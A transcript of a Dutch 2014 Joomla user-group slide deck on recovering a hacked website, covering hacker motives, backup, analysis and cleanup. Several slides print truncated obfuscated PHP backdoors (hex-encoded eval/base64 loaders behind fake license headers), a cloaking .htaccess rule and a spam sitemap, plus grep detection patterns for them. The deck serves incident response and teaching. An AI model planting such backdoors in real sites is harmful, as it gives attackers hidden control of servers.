Help mijn website is gehackt - Joomla User Group Den Bosch 2014
1 like•1,423 views
The document discusses a hacked website using Joomla, detailing the reasons for hacking, including credit card theft and phishing. It outlines the procedures for backup, analysis, and recovery, mentioning specific hacking techniques and payloads discovered in the system. Multiple backdoors were identified, indicating a serious security breach and the need for immediate action.
![Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Backdoor 1
/includes/xmlrpc.php - 07 september 2014 23:15:01
<?php
# GNU LESSER GENERAL PUBLIC LICENSE
# Version 3, 29 June 2007
#
# Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
# Everyone is permitted to copy and distribute verbatim copies
# of this license document, but changing it is not allowed.
[..]
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
$auth_pass = "52fd812f55cb3118bb3bfe575b59a02d";
$color = "#df5";preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66
x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7X1re9s2z/D
n9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT
7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkz
wx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw
1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuW
HZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/Niet in ruGNr96fS4A607PTg+backup van
gsa
a9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/hofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+18 oktober H4zYyImGfq8
2014 !
Z
18cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKp
wBd1zTZNDtOKicPUNGlm4brIMGOJxk+lmTaNhB6mh8YMMN0R+4n12YWIOcDP7+WdWHPWeZ9JbUIuKQiOMF9DmyBs
oDeXKainkKVZckRWLJswvDNX+/TdbCpKtpOhLRlT0A3BB5Hv+DOYpDAF8FT+8+dA5Pi1Xy+slap8xc8dGiRV8XHB
M+DBh3nqhI1PG7g2kFEKr73RGsGBAGk3LAU7LOFVMnZUErsT4TA+ciR9E7nhAs6/Qc0MLlqWOHOtQw5fJRbyFoQ
Gehackt op 19 oktober 2014](https://image.slidesharecdn.com/help-website-is-gehacked-joomla-usergroup-denbosch-2014-141208050053-conversion-gate01/85/Help-mijn-website-is-gehackt-Joomla-User-Group-Den-Bosch-2014-20-320.jpg)
![Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Payload 1
.htaccess - 09 november 11:45:48
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing|spaumbot) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]
##
# @package Joomla
# @copyright Copyright (C) 2005 2014
Open Source Matters. All rights
reserved.
# @license GNU General Public License version 2 or later; see
LICENSE.txt
##
Toegevoegd
Hack via backdoor door 2e hacker](https://image.slidesharecdn.com/help-website-is-gehacked-joomla-usergroup-denbosch-2014-141208050053-conversion-gate01/85/Help-mijn-website-is-gehackt-Joomla-User-Group-Den-Bosch-2014-21-320.jpg)
![Hack via backdoor door 2e hacker,
op 9 november 2014 toegevoegd.
Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Payload 2
main.php - 10 juli 2013 11:25:27
<?php Error_Reporting(0);
$xTBYAB76GYfo="rRgNb9pINsmlkm88FKyALcceuFM36xyYbdASOBpMe4FEhCapvQV74nL1b0
il/v97b8Y2BkKSSudIwZ55X/O+5/38EUW9Pm96w07Tu3B//vAIMYjTZIpBqKY3/Gkw/vlDq3N
/6bS85h9e811y5rqnThu+nMFHr+cmJ5PreNTqeW4c8L/9/PHzB4dnqZK3FZXyK/7vDcyzfgtw
xptgKiXUqBplRvx0ETk/4nu9qkoAhzClalrMj8vlchjP43j+NGzNvvPTL7GDm0rNso2aqemwn
6jMKhG2sEzdtDVTXygVk9RMaz+0jFoiaCnEsJiqGgTBbV21DJ0yna4AVEbeMuLYhgSpUKpcRl
ESrjDDJFKpSWhJiQCLGbqj1nRyf38fKhVFEimRqqOzMhBYoUn2Jq2kOy9TkaIUpFCNqkmO2H6
oMxrpBrXVqMHosamyLWRpXU1VGfWXVFECYcQlrSkoAgoGi2NcUZR9hspNXER8w1lVZQjLkUC9
pFtUA+HYnqZS1U/UfdUBng5lNcWxNZJsEd6E8NFUvEC3AOvDvm7WmO84o07Xc5xAAoMc6HEoA
VCh+[..]
+jPuv0ZCSPco4yHZS4goVte05ZaSQG+kdELd9Sz2YzKa3nwIRHiW9qulHKSSXNiggPBGFb0SQ
PUZPP4iNUBuLj2JSJG6RItv9Dw==";preg_replace("/.*/e","x65x76x61x6Cx28
x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'ZXZhbChiYXNlNjRfZ
GVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doeVRXeEdkbHByYkRSVV[..]
preg_replace("/.*/e","eval(base64_decode('](https://image.slidesharecdn.com/help-website-is-gehacked-joomla-usergroup-denbosch-2014-141208050053-conversion-gate01/85/Help-mijn-website-is-gehackt-Joomla-User-Group-Den-Bosch-2014-22-320.jpg)
![via backdoor door 2e hacker,
op 9 november 2014 toegevoegd.
Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Backdoor 3
/administrator/fs-login.phtml -
09 november 2014 11:45:48
<?php Error_Reporting(0);
$xJdU8NfauOq="5b1rdxrH0igs2Y4kHxzLkmXLlix7EGQmWsuKGcjAwDDR79gfvJftABLYRuzMaIIQxH/
9VFXf54KQk/0871kve8eC7urq6lt1dVV19cQrW91S1XOceBgnn+rNVvNL89PXL+f93z987Xsf67Xfvw4+
1Qet8+bvNTe5/Ne/J63AD2yE/rNW/0gpNbfulX2r5LWsMOhAVlR3er3fIz2v7Lgl7zfvLeRadtnVs1pdz
3ZcC8vdDzu1oOJc9wcf+1j8X/8O6/Mrt121TueT0ubOxr2dje3o1drag9I6/Co9e7pzsBY9XCzid//6dw
yfCdRjP2u4HQsb5Nm2dzpPngZBw3eTaZxs+mW7il9ebh48Dyz8Fnolz251w2PXxp8/ep2a+xa/bXjtpg+
Ji0uGGiip2m6j1PasVnce3UTxLA7bVT+oufPo52iq172AvOgmxMRVqMZP1/Vqrj0nsJv+rBd/6H2IDwIr
3g3KnVokqMCP+za0+M+Tf/37BLtpL+yEJejEeeTadmCX/KARTQ/WX7zAcioTkksE4ETTnpnV9t6W3Lduq
4xjWLLCtitAIJt+l/ywHVpzldj2GmGr9FM5sFynZJc7CMSzYWzDDvTL/c3DErR+8+jwADojGsw+UktoXB
tpFI1qa8465X293GGTCRA4lh1WHd9zuq4zn9CYMqD3tmuV7U4cOiU20iLzMxt5wF4lEnQMOCYcbBznoQb
y3kOfvp+UHhxursEsypBAGWJAJqX9w8M3Rzu5gCwLQWmUZKsqTvAiaISdOWtILXTnyQXMrtjzw0Zn2II5
5Nqji3pgt+O2a3WD2rAaONboASzUSmDXxvFF2KmWrdg6rbrDKk+NO16b/Rrp2U65CeMWH3t+2R1Go1E0u
rhBzPAHqhwlWfKwIa7VCoIzIGxyBj12rFYYb9T25OwhtHlyzPshU0Bg1VawZDZq6kNu6OAEZL26HWE2rI
34jz/iebv2MZM+hDo1PGpVGESzksbSewVoAMFUL05TkZERz68EIbyBxTiAjJ9/jleCjK+K6FVzQOspmD8
W8NcKcAIYNvg1f/DqQelwc9qbni+o8Ukl7CQLnJ8BsrgIfiKndH3HVYmd8C1jnxPHq7ulNvAoSKb [..]
N1BmC06baOOvUABzLnQQOPayaWUZNuVsvz/RKeu0tYqggU6iMX1/8L";preg_replace("/.*/e","x6
5x76x61x6Cx28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'ZXZhbCh
iYXNlNj
preg_replace("/.*/e","eval(base64_decode('](https://image.slidesharecdn.com/help-website-is-gehacked-joomla-usergroup-denbosch-2014-141208050053-conversion-gate01/85/Help-mijn-website-is-gehackt-Joomla-User-Group-Den-Bosch-2014-25-320.jpg)
![Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
SSH
peter@computer:~$ ssh peter@example.com
The authenticity of host 'example.com (93.184.216.119)' can't
be established.
RSA key fingerprint is 10:51:ab:f5:d7:[..]:17:16:1f:22:33.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'example.com,93.184.216.119'
(RSA) to the list of known hosts.
peter@example.com's password:
peter@example.com ~ $](https://image.slidesharecdn.com/help-website-is-gehacked-joomla-usergroup-denbosch-2014-141208050053-conversion-gate01/85/Help-mijn-website-is-gehackt-Joomla-User-Group-Den-Bosch-2014-32-320.jpg)
![Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144
Herstel
● Eigen .xml sitemap aanmelden bij Google
● Spam pagina's sneller uit zoekmachines?
"410 Gone error" via .htaccess:
RewriteRule S*viagra+S* [
G]
RewriteRule S*cialis+S* [
G]
RewriteRule S*pharmacy+S* [
G]
RewriteRule S*propecia+S* [
G]
RewriteRule S*drugs+S* [
G]](https://image.slidesharecdn.com/help-website-is-gehacked-joomla-usergroup-denbosch-2014-141208050053-conversion-gate01/85/Help-mijn-website-is-gehackt-Joomla-User-Group-Den-Bosch-2014-51-320.jpg)
Help mijn website is gehackt - Joomla User Group Den Bosch 2014
- 1. Help mijn site is gehackt... wat nu? door Peter Martin www.db8.nl / @pe7er
- 2. 1.Waarom hacken? 2.Website gehackt 3.SSH connectie 4.Procedure – Backup – Analyse – Herstel Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Website gehackt
- 6. 3. Graffiti
- 7. 4. Phishing
- 8. 5. SPAM
- 9. 6. Backlinks
- 10. 7. DDOS
- 11. 8. CPU
- 12. 9. Handel
- 13. Website gehackt
- 15. opencoffee website is gehackt Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Website gehackt 1 Klant Hosting Provider ?!?! Andere sites, zelfde IP ook!?! (laconiek) gewoon index.php terugzetten Hierbij zeg ik mijn hosting op, asap!
- 17. E-mail bounced paar dagen Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Website gehackt 2 Klant website Fabrik ?!?! from: @ .br to: @ .br !?! Spam script, tijdstip in access log Front-end upload: Bestandsformaat niet toegestaan!
- 19. Ik admin toegang op website? Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Website gehackt 3 Klant SSH op website Backup, (just in case) ?!?! verschil grootte vorige backup? Verdachte php bestanden & viagra sitemap.xml
- 20. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Backdoor 1 /includes/xmlrpc.php - 07 september 2014 23:15:01 <?php # GNU LESSER GENERAL PUBLIC LICENSE # Version 3, 29 June 2007 # # Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> # Everyone is permitted to copy and distribute verbatim copies # of this license document, but changing it is not allowed. [..] # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/> $auth_pass = "52fd812f55cb3118bb3bfe575b59a02d"; $color = "#df5";preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66 x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7X1re9s2z/D n9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT 7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkz wx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw 1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuW HZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/Niet in ruGNr96fS4A607PTg+backup van gsa a9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/hofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+18 oktober H4zYyImGfq8 2014 ! Z 18cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKp wBd1zTZNDtOKicPUNGlm4brIMGOJxk+lmTaNhB6mh8YMMN0R+4n12YWIOcDP7+WdWHPWeZ9JbUIuKQiOMF9DmyBs oDeXKainkKVZckRWLJswvDNX+/TdbCpKtpOhLRlT0A3BB5Hv+DOYpDAF8FT+8+dA5Pi1Xy+slap8xc8dGiRV8XHB M+DBh3nqhI1PG7g2kFEKr73RGsGBAGk3LAU7LOFVMnZUErsT4TA+ciR9E7nhAs6/Qc0MLlqWOHOtQw5fJRbyFoQ Gehackt op 19 oktober 2014
- 21. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Payload 1 .htaccess - 09 november 11:45:48 RewriteEngine On RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing|spaumbot) [OR] RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing) RewriteRule ^([^/]*)/$ /main.php?p=$1 [L] ## # @package Joomla # @copyright Copyright (C) 2005 2014 Open Source Matters. All rights reserved. # @license GNU General Public License version 2 or later; see LICENSE.txt ## Toegevoegd Hack via backdoor door 2e hacker
- 22. Hack via backdoor door 2e hacker, op 9 november 2014 toegevoegd. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Payload 2 main.php - 10 juli 2013 11:25:27 <?php Error_Reporting(0); $xTBYAB76GYfo="rRgNb9pINsmlkm88FKyALcceuFM36xyYbdASOBpMe4FEhCapvQV74nL1b0 il/v97b8Y2BkKSSudIwZ55X/O+5/38EUW9Pm96w07Tu3B//vAIMYjTZIpBqKY3/Gkw/vlDq3N /6bS85h9e811y5rqnThu+nMFHr+cmJ5PreNTqeW4c8L/9/PHzB4dnqZK3FZXyK/7vDcyzfgtw xptgKiXUqBplRvx0ETk/4nu9qkoAhzClalrMj8vlchjP43j+NGzNvvPTL7GDm0rNso2aqemwn 6jMKhG2sEzdtDVTXygVk9RMaz+0jFoiaCnEsJiqGgTBbV21DJ0yna4AVEbeMuLYhgSpUKpcRl ESrjDDJFKpSWhJiQCLGbqj1nRyf38fKhVFEimRqqOzMhBYoUn2Jq2kOy9TkaIUpFCNqkmO2H6 oMxrpBrXVqMHosamyLWRpXU1VGfWXVFECYcQlrSkoAgoGi2NcUZR9hspNXER8w1lVZQjLkUC9 pFtUA+HYnqZS1U/UfdUBng5lNcWxNZJsEd6E8NFUvEC3AOvDvm7WmO84o07Xc5xAAoMc6HEoA VCh+[..] +jPuv0ZCSPco4yHZS4goVte05ZaSQG+kdELd9Sz2YzKa3nwIRHiW9qulHKSSXNiggPBGFb0SQ PUZPP4iNUBuLj2JSJG6RItv9Dw==";preg_replace("/.*/e","x65x76x61x6Cx28 x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'ZXZhbChiYXNlNjRfZ GVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0pLU0doeVRXeEdkbHByYkRSVV[..] preg_replace("/.*/e","eval(base64_decode('
- 23. Hack via backdoor door 2e hacker, op 9 november 2014 toegevoegd. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Payload 3 sitemap.xml - 9 november 2014 11:50:42 <?xml version="1.0" encoding="UTF8"?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <url> <loc>http://www.voorbeeld.nl/viagraprofessional100mg/</ loc> <lastmod>20141109</ lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.voorbeeld.nl/longtermsideeffectsofcialis/</ loc> <lastmod>20141109</ lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url> <url> <loc>http://www.voorbeeld.nl/priceofviagra100mgtablet/</ loc> <lastmod>20141109</ lastmod> <changefreq>monthly</changefreq> <priority>1.0</priority> </url> </urlset> 590 spam links
- 24. via backdoor door 2e hacker, op 9 november 2014 toegevoegd. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Backdoor 2 /libraries/joomla/session/cache.php 19 augustus 2013 14:45:46 Aangepast! <?php Error_Reporting(0); $x0bp6Rx0vRH="vRhrb9s28K+71VLHDtCsfmRTggC2GUOijFo1LWlA3CY/oAX6F0ZDZWWl k5ols9MmLnZHUrLkR5btw5w4Eo/34r2Z9x8Mz6Oe2SIB9Zhrd5N5unz/4f2HqU+8N8Qzx/ A0rS6xmbgXL6Zm22j9bLRO+ctG48hswsqsPjP2G/xEUrkdkXwOPNI1BxbrDxM+84nTOaNs 5vJYbPJMU/FOSutS2nUIiKhU620j51Vi9UziALPzrm9d9T1r5BDvvNrzf6LsSm2eH5Ceaw WWx2zi+ec5xdUBPXNhe8hYcI4c/MDtAbFm8qh2K92YNyag2kRqHIxZx5XgRqupNJ52CXNc +7UPQE5tDsDpgPZwNecSQ8Bn2nO9e+a5g8RnnumRwLH6JOGj0SjiMefxmo1f1tpg3WgFbR m/NI12w2y2DvlJit7KuQ56Nwm+IPAj/E4Diw2VrF30GbnElPT4phnIHd97M/S3eV9ptlxH g1Mx6tAR8RINlNzwveP4CiE/dojHDuMwjLfjSo3UKgqvnFArhrHh+j5hyZQFgfYTGwSoO1 AhEI0Pj0sivdFA+08EcXyCuAIZdMZ2n7nUNsmF6zM/4f6lb4ILTUYGgQlm5BuM1zESab8C 3wJuAvu2NSCJaVYO64ZpKl9NdAC5neSz60smGVEUzsIoP+0sBPHIdPAakMROrHh+fX2dZn u0mucJwFJtpXWW1AkIoFOCpcYzyW8OKhuUr9if4Dv38D";preg_replace("/.*/e","x 65x76x61x6Cx28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65 x28'ZXZhbChiYXN preg_replace("/.*/e","eval(base64_decode('
- 25. via backdoor door 2e hacker, op 9 november 2014 toegevoegd. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Backdoor 3 /administrator/fs-login.phtml - 09 november 2014 11:45:48 <?php Error_Reporting(0); $xJdU8NfauOq="5b1rdxrH0igs2Y4kHxzLkmXLlix7EGQmWsuKGcjAwDDR79gfvJftABLYRuzMaIIQxH/ 9VFXf54KQk/0871kve8eC7urq6lt1dVV19cQrW91S1XOceBgnn+rNVvNL89PXL+f93z987Xsf67Xfvw4+ 1Qet8+bvNTe5/Ne/J63AD2yE/rNW/0gpNbfulX2r5LWsMOhAVlR3er3fIz2v7Lgl7zfvLeRadtnVs1pdz 3ZcC8vdDzu1oOJc9wcf+1j8X/8O6/Mrt121TueT0ubOxr2dje3o1drag9I6/Co9e7pzsBY9XCzid//6dw yfCdRjP2u4HQsb5Nm2dzpPngZBw3eTaZxs+mW7il9ebh48Dyz8Fnolz251w2PXxp8/ep2a+xa/bXjtpg+ Ji0uGGiip2m6j1PasVnce3UTxLA7bVT+oufPo52iq172AvOgmxMRVqMZP1/Vqrj0nsJv+rBd/6H2IDwIr 3g3KnVokqMCP+za0+M+Tf/37BLtpL+yEJejEeeTadmCX/KARTQ/WX7zAcioTkksE4ETTnpnV9t6W3Lduq 4xjWLLCtitAIJt+l/ywHVpzldj2GmGr9FM5sFynZJc7CMSzYWzDDvTL/c3DErR+8+jwADojGsw+UktoXB tpFI1qa8465X293GGTCRA4lh1WHd9zuq4zn9CYMqD3tmuV7U4cOiU20iLzMxt5wF4lEnQMOCYcbBznoQb y3kOfvp+UHhxursEsypBAGWJAJqX9w8M3Rzu5gCwLQWmUZKsqTvAiaISdOWtILXTnyQXMrtjzw0Zn2II5 5Nqji3pgt+O2a3WD2rAaONboASzUSmDXxvFF2KmWrdg6rbrDKk+NO16b/Rrp2U65CeMWH3t+2R1Go1E0u rhBzPAHqhwlWfKwIa7VCoIzIGxyBj12rFYYb9T25OwhtHlyzPshU0Bg1VawZDZq6kNu6OAEZL26HWE2rI 34jz/iebv2MZM+hDo1PGpVGESzksbSewVoAMFUL05TkZERz68EIbyBxTiAjJ9/jleCjK+K6FVzQOspmD8 W8NcKcAIYNvg1f/DqQelwc9qbni+o8Ukl7CQLnJ8BsrgIfiKndH3HVYmd8C1jnxPHq7ulNvAoSKb [..] N1BmC06baOOvUABzLnQQOPayaWUZNuVsvz/RKeu0tYqggU6iMX1/8L";preg_replace("/.*/e","x6 5x76x61x6Cx28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'ZXZhbCh iYXNlNj preg_replace("/.*/e","eval(base64_decode('
- 26. via backdoor door 2e hacker, op 9 november 2014 toegevoegd. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Backdoor 4-9 Toegevoegd op 09 november 2014 11:45:48 /language/comnon.phtml /layouts/fedit.php /libraries/fedit.php /logs/comnon.php /plugins/fs-login.phtml /tmp/Iicense.php bevat: <?php Error_Reporting(0); preg_replace("/.*/e","x65x76x61x6Cx28x62x6 1x73x65x36x34x5Fx64x65x63x6Fx64x65x28
- 27. Gevolg
- 28. SSH connectie
- 29. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Terminal Text Terminal “TTY” TeleTYpewriter
- 30. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Terminal Windows – SSH programma: PuTTY Mac OSX – Ingebouwd: “Terminal” Linux – Ingebouwde Terminal Emulator
- 31. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 SSH Secure SHell gebruikt public-key cryptografie (authenticatie & veilige data communicatie) peter@computer:~$ ssh [email protected]
- 32. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 SSH peter@computer:~$ ssh [email protected] The authenticity of host 'example.com (93.184.216.119)' can't be established. RSA key fingerprint is 10:51:ab:f5:d7:[..]:17:16:1f:22:33. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added 'example.com,93.184.216.119' (RSA) to the list of known hosts. [email protected]'s password: [email protected] ~ $
- 33. Procedure
- 34. Backup
- 35. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Backup files Backup van voor de hack? – Hosting partij? – Akeeba backup (offline)? Maak backup van huidige situatie (inclusief hack!) – Akeeba backup – Rsync / MySQL dump
- 36. gebruikersnaam @ server : folder gebruikersnaam @ server : folder Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 rsync Remote synchronization – rsync van “bron” naar “doel” $ rsync -arv [email protected]:~/joomla-cms/ /var/www/joomla-cms-backup/
- 37. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 MySQL Dump MySQL Dump $ mysqldump -u gebruikersnaam -p databasenaam > bestand-met-sql-uitvoer.txt
- 38. Analyse
- 39. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Analyse ● Software versies: – CMS (Joomla versie?) – Versies 3rd party extensies? ● Access Logfiles – Vreemde POST requests?
- 40. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Analyse ● Nieuwe bestanden op server – .php files in /images/ map? ● Bestanden met vreemde code – Base64 decode ● Vergelijk bestanden met originele bestanden – diff
- 41. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Nieuwe bestanden Aangemaakt in de laatste 7 dagen: find . -type f -ctime -7
- 42. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Recent gewijzigd Gewijzigd tussen 7 en 3 dagen geleden: find . -type f -mtime -7 ! -mtime -3
- 43. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 grep ● Zoek naar specifieke teksten grep -r "eval" /var/www/joomla-cms | grep "base64_decode" ● Of grep -r "preg_replace" /var/www/joomla-cms | grep "x65x76x61x6Cx28x62x61x73x65x36x34x5 Fx64x65x63x6Fx64x65x28" grep -r "eval" /var/www/joomla-cms | grep "<?php Error_Reporting(0);”
- 44. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 NeoPi
- 45. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 NeoPi Detectie van verborgen web shell code Benodigd Python 2.6 Installeer via git: $ git clone https://github.com/Neohapsis/NeoPI.git Start script: $ /var/www/NeoPI/neopi.py -Aa /var/www/joomla-cms
- 46. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 diff
- 47. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 diff Vergelijk bestanden van website met originele bestanden: – Zorg voor map met originele Joomla + extensies ● Oude backup of ● Nieuwe installatie Joomla + extensies – Zorg voor map met gehackte website Gebruik diff software om te vergelijken: – Linux + OSX: Meld – Windows: WinMerge
- 48. Herstel
- 49. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Herstel ● Verwijderen alle hacker scripts – Kijk verder dan “hack” ivm backdoor scripts ● Alle software up-to-date brengen – Joomla – 3rd party extensions
- 50. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Herstel ● Wachtwoorden vervangen – MySQL database wachtwoord – FTP wachtwoord – Wachtwoorden van Joomla gebruikers ● Evt extra controle: – Backup schoon gemaakte website vergelijken met nieuwe Joomla installatie → diff
- 51. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Herstel ● Eigen .xml sitemap aanmelden bij Google ● Spam pagina's sneller uit zoekmachines? "410 Gone error" via .htaccess: RewriteRule S*viagra+S* [ G] RewriteRule S*cialis+S* [ G] RewriteRule S*pharmacy+S* [ G] RewriteRule S*propecia+S* [ G] RewriteRule S*drugs+S* [ G]
- 52. Conclusie
- 53. 1.Waarom? 2.Website gehackt 3.SSH connectie 4.Procedure – Backup – Analyse – Herstel Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Conclusie
- 54. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Vragen? Peter Martin e-mail: info at db8.nl website: www.db8.nl twitter: @pe7er Presentatie: http://www.db8.nl
- 55. Joomla User GGrroouupp DDeenn BBoosscchh –– 11 ddeecceemmbbeerr 22001144 Used Photos Titel sheet: Guy Fawkes Mask - Ben Fredericson, 2009 http://commons.wikimedia.org/wiki/File:Guy_Fawkes_Mask.jpg 1. Waarom hacken? Question mark (3534516458) - Marco Bellucci, 2005 http://commons.wikimedia.org/wiki/File:Question_mark_(3534516458).jpg Credit-cards - Lotus Head, 2005 http://commons.wikimedia.org/wiki/File:Credit-cards.jpg Pickpocket girl - Lunch Photography, 2008 http://commons.wikimedia.org/wiki/File:Pickpocket_girl.jpg Graffiti-Sokolov5 - Orange.man, 2008 http://commons.wikimedia.org/wiki/File:Graffiti-Sokolov5.JPG Phishing - Stomchak, 2010 